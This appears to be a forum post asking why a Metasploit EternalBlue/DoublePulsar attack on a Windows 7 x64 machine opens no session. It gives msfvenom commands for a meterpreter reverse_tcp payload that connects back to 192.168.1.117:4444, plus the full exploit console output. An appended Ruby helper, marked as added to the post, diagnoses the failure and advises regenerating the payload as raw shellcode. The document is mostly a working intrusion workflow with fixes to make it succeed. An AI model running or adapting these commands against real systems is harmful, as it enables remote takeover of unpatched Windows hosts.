I generated a custom payload with msfvenom like so (first I want to test with the simplest custom payload: no encoder or anything):
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.117 LPORT=4444 -f exe -o payload.exe
and I have also made a Ruby version (I thought the size might have something to do with it):
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.117 LPORT=4444 -f ruby -o payload.rb
My target is Windows 7 Ultimate x64.
I am using the windows/smb/eternalblue_doublepulsar exploit, and so far it has never failed me.
Here are some side questions I have:
- What is PAYLOADSTR and how do I use it?
- Is /root/ needed before the file name? (I get the same result with and without it.)
Here is my attempt and the output:
msf exploit(windows/smb/eternalblue_doublepulsar) > set payload generic/custom
payload => generic/custom
msf exploit(windows/smb/eternalblue_doublepulsar) > set payloadfile /root/payload.exe
payloadfile => /root/payload.exe
msf exploit(windows/smb/eternalblue_doublepulsar) > exploit
[-] 192.168.1.102:445 - Exploit failed: No encoders encoded the buffer successfully.
[*] Exploit completed, but no session was created.
msf exploit(windows/smb/eternalblue_doublepulsar) > set payloadstr C:\
payloadstr => C:\
msf exploit(windows/smb/eternalblue_doublepulsar) > exploit
[*] 192.168.1.102:445 - Generating Eternalblue XML data
[*] 192.168.1.102:445 - Generating Doublepulsar XML data
[*] 192.168.1.102:445 - Generating payload DLL for Doublepulsar
[*] 192.168.1.102:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.1.102:445 - Launching Eternalblue...
000f:err:service:process_send_command receiving command result timed out
[+] 192.168.1.102:445 - Backdoor is already installed
[*] 192.168.1.102:445 - Launching Doublepulsar...
000f:err:service:process_send_command receiving command result timed out
Error sending wrong architecture DLL to target
[+] 192.168.1.102:445 - Remote code executed... 3... 2... 1...
[*] Exploit completed, but no session was created.
msf exploit(windows/smb/eternalblue_doublepulsar) > set payloadstr C:\payload.exe
payloadstr => C:\payload.exe
msf exploit(windows/smb/eternalblue_doublepulsar) > exploit
[*] 192.168.1.102:445 - Generating Eternalblue XML data
[*] 192.168.1.102:445 - Generating Doublepulsar XML data
[*] 192.168.1.102:445 - Generating payload DLL for Doublepulsar
[*] 192.168.1.102:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.1.102:445 - Launching Eternalblue...
000f:err:service:process_send_command receiving command result timed out
[+] 192.168.1.102:445 - Backdoor is already installed
[*] 192.168.1.102:445 - Launching Doublepulsar...
000f:err:service:process_send_command receiving command result timed out
Error sending wrong architecture DLL to target
[+] 192.168.1.102:445 - Remote code executed... 3... 2... 1...
[*] Exploit completed, but no session was created.
msf exploit(windows/smb/eternalblue_doublepulsar) > show options
Module options (exploit/windows/smb/eternalblue_doublepulsar):

   Name                Current Setting                                  Required  Description
   ----                ---------------                                  --------  -----------
   DOUBLEPULSARPATH    /root/Eternalblue-Doublepulsar-Metasploit/deps/  yes       Path directory of Doublepulsar
   ETERNALBLUEPATH     /root/Eternalblue-Doublepulsar-Metasploit/deps/  yes       Path directory of Eternalblue
   PROCESSINJECT       explorer.exe                                     yes       Name of process to inject into (Change to lsass.exe for x64)
   RHOST               192.168.1.102                                    yes       The target address
   RPORT               445                                              yes       The SMB service port (TCP)
   TARGETARCHITECTURE  x64                                              yes       Target Architecture (Accepted: x86, x64)
   WINEPATH            /root/.wine/drive_c/                             yes       WINE drive_c path

Payload options (generic/custom):

   Name         Current Setting    Required  Description
   ----         ---------------    --------  -----------
   PAYLOADFILE  /root/payload.exe  no        The file to read the payload from
   PAYLOADSTR   C:\payload.exe     no        The string to use as a payload

Exploit target:

   Id  Name
   --  ----
   8   Windows 7 (all services pack) (x86) (x64)
I have searched everywhere but could not find a solution, so, as a last hope, I am posting a question here.
Any help is appreciated.
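As an added example (not part of the original post and not Metasploit's own code), here is a small Ruby model of how a generic/custom payload turns its two options into payload bytes, plus the sanity check a practitioner would run before handing the result to an exploit. The point it demonstrates: PAYLOADFILE is read verbatim as raw bytes and PAYLOADSTR is used literally as the payload bytes (it is a string, not a path), so a file produced with `-f exe` is a PE image beginning with the "MZ" DOS header rather than position-independent shellcode, and a string such as C:\payload.exe is just 14 bytes of text. The function names, the precedence of PAYLOADFILE over PAYLOADSTR when both are set, the 16-byte minimum length, and every sample byte string are assumptions constructed for this example.

```ruby
# Added example: models generic/custom payload resolution and checks that
# the bytes look like raw shellcode. Not Metasploit's own implementation.
require 'tempfile'

# Resolve payload bytes the way the two datastore options suggest:
# PAYLOADFILE is read verbatim; PAYLOADSTR is used as-is. Giving the file
# precedence when both are set is an assumption made for this example.
def custom_payload_bytes(datastore)
  file = datastore['PAYLOADFILE'].to_s
  str  = datastore['PAYLOADSTR'].to_s
  raise ArgumentError, 'Either PAYLOADFILE or PAYLOADSTR must be set' if file.empty? && str.empty?
  return File.binread(file) unless file.empty?
  str.b
end

# A PE executable (what msfvenom -f exe writes) starts with the "MZ" DOS header.
# Raw shellcode (msfvenom -f raw) does not carry any such header.
def looks_like_pe?(bytes)
  bytes.byteslice(0, 2) == 'MZ'.b
end

# Classify the resolved bytes. The 16-byte minimum is an assumed heuristic
# that catches a Windows path typed into PAYLOADSTR by mistake.
def check_custom_payload(datastore)
  bytes = custom_payload_bytes(datastore)
  if looks_like_pe?(bytes)
    return { ok: false, size: bytes.bytesize,
             reason: 'PE image, not raw shellcode: regenerate with msfvenom -f raw' }
  end
  if bytes.bytesize < 16
    return { ok: false, size: bytes.bytesize,
             reason: 'too short to be shellcode: PAYLOADSTR is used literally, not as a path' }
  end
  { ok: true, size: bytes.bytesize, reason: 'raw bytes, plausible shellcode' }
end

# Run the check over three constructed inputs (not real msfvenom output):
# a stand-in PE, a stand-in raw buffer, and a path given as PAYLOADSTR.
def demo
  results = {}
  Tempfile.create(['payload', '.exe']) do |pe|
    pe.binmode
    pe.write('MZ'.b + "\x90".b * 200)             # constructed stand-in for -f exe
    pe.flush
    results[:exe_file] = check_custom_payload('PAYLOADFILE' => pe.path)
  end
  Tempfile.create(['payload', '.bin']) do |raw|
    raw.binmode
    raw.write("\xfc\x48\x83\xe4\xf0".b + "\x90".b * 60)  # constructed stand-in for -f raw
    raw.flush
    results[:raw_file] = check_custom_payload('PAYLOADFILE' => raw.path)
  end
  results[:str_path] = check_custom_payload('PAYLOADSTR' => 'C:\payload.exe')
  results
end

if __FILE__ == $PROGRAM_NAME
  demo.each { |name, r| puts "#{name}: ok=#{r[:ok]} size=#{r[:size]} (#{r[:reason]})" }
end
```

Running it prints one line per input: the `.exe` stand-in and the path string are both rejected, and only the raw buffer passes. The same two checks, applied to the real file before `set payloadfile`, tell you whether what you are feeding the exploit is shellcode at all.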